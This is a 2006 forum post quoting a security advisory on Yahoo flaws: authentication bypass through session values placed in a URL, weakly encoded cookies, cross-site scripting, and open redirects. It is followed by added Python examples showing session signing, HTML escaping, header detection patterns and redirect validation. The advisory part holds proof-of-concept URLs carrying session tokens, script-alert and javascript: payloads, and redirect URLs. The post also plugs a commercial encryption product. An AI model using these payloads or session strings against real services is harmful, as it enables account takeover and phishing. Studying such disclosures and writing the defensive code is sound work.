Posted by privacy concerned on June 22, 2006, 4:35 pm
rajesh.sethumadhava@gmail.com wrote:
> Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
> Cookie Encoding Security Weakness, Cross-Site Scripting and URL
> Redirection)
>
> ############################################################################
> #
> # XDisclose Advisory : XD100001
> # Advisory Released : 20th June 06
> # Credit : Rajesh Sethumadhavan
> #
> # Class : Authentication Bypass
> # Session Binding Vulnerability
> # Cookies Encoding Security Weakness
> # Cross-Site Scripting
> # URL redirection
> # Severity : Medium
> # Solution Status : Unpatched
> # Vendor : Yahoo
> # Affected applications : Yahoo multiple web-based services
> #
> ############################################################################
>
>
> Overview:
> Yahoo! Inc. is an American computer services company with a mission to "be
> the most essential global Internet service for consumers and businesses". It
> operates an Internet portal, including the popular Yahoo! Mail. According to
> Web trends Yahoo! is the most visited website on the Internet today with more
> than 400 million unique users. The global network of Yahoo! websites received
> 3.4 billion page views per day on average as of October 2005.
>
> Various Yahoo! services are vulnerable to authentication bypass, session
> binding, weak cookie encoding, cross-site scripting, file inclusion and URL
> redirection vulnerabilities, which are caused by improper validation of
> user-supplied inputs.
>
> Description:
> Multiple vulnerabilities exist in various Yahoo services.
>
>
> 1. Authentication Bypass and Session Binding Vulnerability.
> A malicious user can log on to Yahoo without submitting the username and
> password by constructing a malicious URL using cookies.
>
> The same session (URL) can be used to log in multiple times from multiple IP
> addresses, leading to a session binding vulnerability.
>
> POC: (UPDATED)
>
>
> --------------------------------------------------------------------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
>
> %26l=i42.j4ij/o&.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
>
> BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E--&.done=http%3a//mail.yahoo.com
>
> --------------------------------------------------------------------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
>
> %26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMU
>
> FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E-&.done=http
> %3a//mail.yahoo.com
>
> --------------------------------------------------------------------------
>
> Where "sk" & "d" are the session.
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png
>
>
>
> 2. Cookie Encoding Security Weakness
> The implementation of cookies in Yahoo is so weak that they can be decoded
> easily. A malicious attacker can easily collect much personal information
> using cookies, like year of birth, zipcode, country and name, which can be
> used to get the password from "Yahoo forgot password".
>
> Where:
> sk & d is the session
> n is the password
> l is the username
> p is country, year of birth, gender and more
> b is cookies created
> lg is language
> intl is international language
> iz is zipcode
> jb is industry and title
>
> POC Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png
>
> 3. Cross-Site Scripting.
> This vulnerability results from the failure of the Yahoo! filtering engine
> to block certain user-supplied inputs.
>
> a) Yahoo Calendar Service XSS
> The flaws are due to improper sanitization of inputs passed to
> "Location", "Address", "Street" and "Phone".
>
> ========================================================================
> This event repeats every day.
> </font><br>
> <font face="Arial" size=-1>
> <b>Event Location</b>: <script>alert('Location')</script>
> <br><b>Street</b>: <script>alert('Address')</script>
> <br><b>City, State, Zip</b>: <script>alert('Street')</script>
> <br><b>Phone</b>: <script>alert('Phone')</script>
> </font><br>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png
>
>
> b) Yahoo Options Mail Account XSS
> The flaws are due to improper sanitization of inputs passed to "Name"
> and "Reply to" parameters.
>
>
> ========================================================================
> <tr valign="top">
> <td>Name:</td>
> <td><script>alert('Name')</script></td>
> </tr>
>
> <tr valign="top">
> <td>Email:</td>
> </tr>
> <tr valign="top">
> <td>Reply-To:</td>
> </tr>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
> http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png
>
>
> c) Yahoo Options Filter XSS.
> The flaws are due to improper sanitization of inputs passed to "From"
> and "To" parameters.
>
> ========================================================================
> <b>From</b> contains
> <br>
> <b>To/CC</b> contains
> <br>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
> http://www.xdisclose.bravehost.com/Images/Xss Filter To.png
>
>
> d) Yahoo Ads flash file XSS.
> The flaws are due to improper sanitization of inputs passed to Flash Ads
> files.
>
> Exploit:
> -----------------------------------------------------------------------
> http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
> 20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20
> Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
> 20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG=
> javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20
> Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS
> %20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300x250.swf?
> clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
> By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
> 20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
> 20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript:
> alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> and more
> -----------------------------------------------------------------------
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png
>
>
> e) Yahoo Mail Beta HTTP Header XSS
> The flaws are due to improper sanitization of inputs passed to all HTTP
> headers like Accept, Accept-Charset, Accept-Language, Cache-Control,
> Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma,
> SOAPAction and User-Agent in Yahoo Mail Beta.
>
> POC :
> ========================================================================
> GET :
> http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7/zcUU2
>
> Host: uk.f555.mail.yahoo.com
> User-Agent: <script>alert('User-Agent:')</script>
> Accept:
> text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
> text/plain;q=0.8,image/png,*/*;q=0.5;<script>alert('Accept:')</script>
> Accept-Language:
> en-us,en;q=0.5;<script>alert('Accept-Language:')</script>
> Accept-Encoding:
> gzip,deflate;<script>alert('Accept-Encoding:')</script>
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
> ('Accept-Charset:')</script>
> Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
> Connection: keep-alive;<script>alert('Connection:')</script>
> SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:')
> </script>
> Content-Length: <script>alert('Content-Length:')</script>
> Content-Type: application/xml;<script>alert('Content-Type:')</script>
> Cookie: B=dcnl4j129c7tu&b=3&s=j3;
> F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq;
> Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19|24|&iz=123456
> r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
> T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV&
> d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0
> E-;
> U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11;
> YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script>
> Pragma: no-cache;<script>alert('Pragma:')</script>
> Cache-Control: no-cache;<script>alert('Cache-Control:')</script>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Charset.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Language.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cache-Control.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Length.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Type.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png
>
>
> Impact:
> Successful exploitation allows execution of arbitrary script code
> in a user's browser session in the context of an affected site, which may
> allow stealing cookie-based authentication credentials.
>
> 3. URL redirection.
> This is due to a failure to filter incoming untrusted data before the
> content reaches their users. This can be exploited for phishing attacks. The
> vulnerable parameters are Yahoo search web, image, video, preferences, cache,
> Yahoo answers and more URLs containing /*http://yahoo.com or
> /**http://yahoo.com
>
> Exploit:
>
> ---------------------------------------------------------------------------
>
> http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/EXP=
> 1148028186/**http%3a//www.xdisclose.com
>
> http://search.yahoo.com/preferences/preferences?pref_done=
> http%3a//www.xdisclose.com
>
> ---------------------------------------------------------------------------
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/URL Redirection WebSearch.png
> http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
> http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png
>
> 4) Interesting facts about Yahoo
> Yahoo Mail Inbox shows a wrong unread message count if it is above 65535
> unread messages.
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png
>
> Original Advisory:
> http://www.xdisclose.com/XD100001.txt
>
> Credits:
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability
>
Wow! Should you start encrypting emails in your Yahoo Mail account now?
You can do this easily using EaSecure available at
http://www.easecure.com/ .
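The first two findings in the quoted advisory (a session that can be established from cookie values carried in a URL, and a cookie that encodes the user's name, password and profile data in a trivially decodable form) are both session-design problems. The following is an added example, not code from the advisory or from Yahoo, showing the defensive pattern: an opaque random token signed with an HMAC, all profile data kept server-side, the session bound to a hash of the client's IP and User-Agent, and session material accepted only from the Cookie header, never from the query string. The `SERVER_KEY`, the `sid` cookie name, the hostnames and the IP addresses are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed demo key; a real deployment loads it from a secret store.
SERVER_KEY = b"constructed-demo-key-not-for-production"


@dataclass
class Session:
    user: str
    created: float
    client_hash: str                           # fingerprint the session is bound to
    profile: dict = field(default_factory=dict)  # PII stays here, never in the cookie


class SessionStore:
    """Issues opaque, HMAC-signed session tokens and keeps all user data server-side."""

    def __init__(self, key: bytes = SERVER_KEY, ttl: int = 3600):
        self.key = key
        self.ttl = ttl
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def _client_hash(ip: str, user_agent: str) -> str:
        return hashlib.sha256(f"{ip}|{user_agent}".encode()).hexdigest()

    def _sign(self, token: str) -> str:
        return hmac.new(self.key, token.encode(), hashlib.sha256).hexdigest()

    def login(self, user: str, profile: dict, ip: str, user_agent: str) -> str:
        """Return the cookie value: random token + signature. Nothing about the user is encoded in it."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = Session(user, time.time(), self._client_hash(ip, user_agent), profile)
        return f"{token}.{self._sign(token)}"

    def resolve(self, cookie: Optional[str], ip: str, user_agent: str) -> Optional[Session]:
        """Check signature, expiry and client binding; None on any failure."""
        if not cookie or "." not in cookie:
            return None
        token, sig = cookie.rsplit(".", 1)
        if not hmac.compare_digest(sig, self._sign(token)):
            return None
        sess = self._sessions.get(token)
        if sess is None or time.time() - sess.created > self.ttl:
            return None
        if not hmac.compare_digest(sess.client_hash, self._client_hash(ip, user_agent)):
            return None
        return sess


# Query-string keys that must never be honoured as session material (constructed list).
FORBIDDEN_QUERY_KEYS = ("sid", ".y", ".t")


def session_from_request(store: SessionStore, url: str, cookie_header: Optional[str],
                         ip: str, user_agent: str) -> Tuple[Optional[Session], bool]:
    """Resolve the session from the Cookie header only.

    Returns (session, suspicious). `suspicious` is True when the query string
    carried session-looking parameters, which is worth logging: the advisory's
    reset_cookies endpoint took cookie values from the URL, so a crafted link
    could establish a session without credentials.
    """
    params = parse_qs(urlsplit(url).query)
    suspicious = any(k in params for k in FORBIDDEN_QUERY_KEYS)
    cookies: Dict[str, str] = {}
    for part in (cookie_header or "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    if "sid" not in cookies:
        return None, suspicious
    return store.resolve(cookies["sid"], ip, user_agent), suspicious
```

Binding a session to the client IP is a trade-off: it stops the "same session from multiple IP addresses" reuse the advisory describes, but it also logs out mobile users who change networks, so many sites bind only to the User-Agent and rely on a short TTL plus re-authentication for sensitive actions instead.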
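The cross-site scripting findings all share one root cause: user-controlled values (calendar fields, account settings, and in the Mail Beta case the request headers themselves) were written into HTML without output encoding. The following is an added example, not part of the advisory or Yahoo's code, with two pieces: a renderer that escapes every field for HTML element content, and a small detection routine that flags request headers carrying markup or script markers so they can be logged or alerted on. The sample event and sample request are constructed to carry advisory-style payloads.

```python
import html
import re
from typing import Dict, List

# Constructed calendar event; every field is attacker-controlled in the advisory's scenario.
SAMPLE_EVENT = {
    "location": "<script>alert('Location')</script>",
    "street": "<script>alert('Address')</script>",
    "city_state_zip": "Austin, TX 78701",
    "phone": "555-0100\" onmouseover=\"alert(1)",
}

# Constructed raw request in the shape of the advisory's Mail Beta proof of concept.
SAMPLE_REQUEST = """GET /ymws?m=ListFolders HTTP/1.1
Host: mail.example.test
User-Agent: <script>alert('User-Agent:')</script>
Accept: text/html;q=0.9,*/*;q=0.5;<script>alert('Accept:')</script>
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
"""


def render_event(event: Dict[str, str]) -> str:
    """Render the event as HTML, escaping every user-controlled value for element content.

    quote=True also turns '"' into &quot;, so a value cannot break out of an
    attribute if a template later places it inside one.
    """
    def esc(key: str) -> str:
        return html.escape(event.get(key, ""), quote=True)

    return (
        "<p><b>Event Location</b>: " + esc("location") + "<br>"
        "<b>Street</b>: " + esc("street") + "<br>"
        "<b>City, State, Zip</b>: " + esc("city_state_zip") + "<br>"
        "<b>Phone</b>: " + esc("phone") + "</p>"
    )


def render_request_echo(headers: Dict[str, str]) -> str:
    """Echo request headers (e.g. on a debug or error page) without letting them become markup."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(v)}</td></tr>"
        for k, v in headers.items()
    )
    return "<table>" + rows + "</table>"


# Markers of injected markup: a script tag, a javascript: URL, or an event-handler attribute.
SCRIPT_MARKER = re.compile(r"<\s*/?\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.I)


def parse_raw_headers(raw: str) -> Dict[str, str]:
    """Split a raw request (request line first) into a header name -> value dict."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines()[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip()] = v.strip()
    return headers


def suspicious_headers(headers: Dict[str, str]) -> List[str]:
    """Names of headers whose values carry markup or script markers, for logging or alerting."""
    return [k for k, v in headers.items() if SCRIPT_MARKER.search(v)]
```

Escaping is the fix; the detection routine is a monitoring aid only, since a filter that merely blocks the strings it recognises is exactly the kind of "filtering engine" the advisory shows being bypassed.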
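The URL redirection finding shows two redirector shapes: a `pref_done`-style query parameter, and a target embedded in the path after a `/*` or `/**` marker, with the scheme hidden behind `%3a`. The following is an added example, not code from the advisory or from Yahoo, of a redirect-target validator that decodes before checking, accepts only same-site paths or allowlisted hosts, and rejects protocol-relative, backslash and userinfo tricks; a second function runs the same check over constructed access-log request lines to flag abuse attempts. The allowlist, parameter names and log lines are constructed.

```python
import re
from typing import List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed allowlist of hosts a redirect may leave the current site for.
ALLOWED_HOSTS = {"mail.example.test", "search.example.test"}

# Constructed list of parameter names that carry a post-action destination.
REDIRECT_PARAMS = ("pref_done", ".done", "url", "next", "return")

# Constructed sample request lines in the shape of the advisory's two redirector styles.
SAMPLE_LOG = [
    "GET /preferences/preferences?pref_done=http%3a//www.attacker.test HTTP/1.1",
    "GET /preferences/preferences?pref_done=/inbox HTTP/1.1",
    "GET /_ylt=abc/SIG=xyz/**http%3a//www.attacker.test HTTP/1.1",
    "GET /search?p=hello HTTP/1.1",
]

# Scheme smuggled into the path behind a '/*' or '/**' marker, encoded or not.
PATH_SCHEME = re.compile(r"/\*+https?(:|%3a)//", re.I)


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Return `raw` if it is a same-site path or an allowlisted absolute URL, else `default`."""
    if not raw:
        return default
    target = raw
    # Decode a few layers so %3a//, %253a// and friends cannot hide a scheme from the check.
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    target = target.strip().replace("\\", "/")   # browsers treat '\' like '/'
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: must be a plain path with no scheme hidden inside it.
        if target.startswith("//") or "://" in target or target.startswith("/*"):
            return default
        return target if target.startswith("/") else default
    # Absolute URL: only http(s) to an allowlisted host; hostname ignores userinfo and port.
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return default


def flag_redirect_abuse(request_line: str) -> List[str]:
    """Reasons a logged request line looks like an open-redirect attempt (empty if clean)."""
    path = request_line.split(" ")[1]
    parts = urlsplit(path)
    reasons = []
    if PATH_SCHEME.search(parts.path):
        reasons.append("scheme smuggled into path")
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key in REDIRECT_PARAMS:
            for value in values:            # parse_qs has already percent-decoded the value
                if safe_redirect_target(value) != value:
                    reasons.append(f"off-site destination in {key}")
    return reasons
```

The allowlist is deliberately a set of exact hostnames: a suffix or substring match would accept `mail.example.test.attacker.test`, and checking `startswith("http://mail.example.test")` would accept `http://mail.example.test@attacker.test/`.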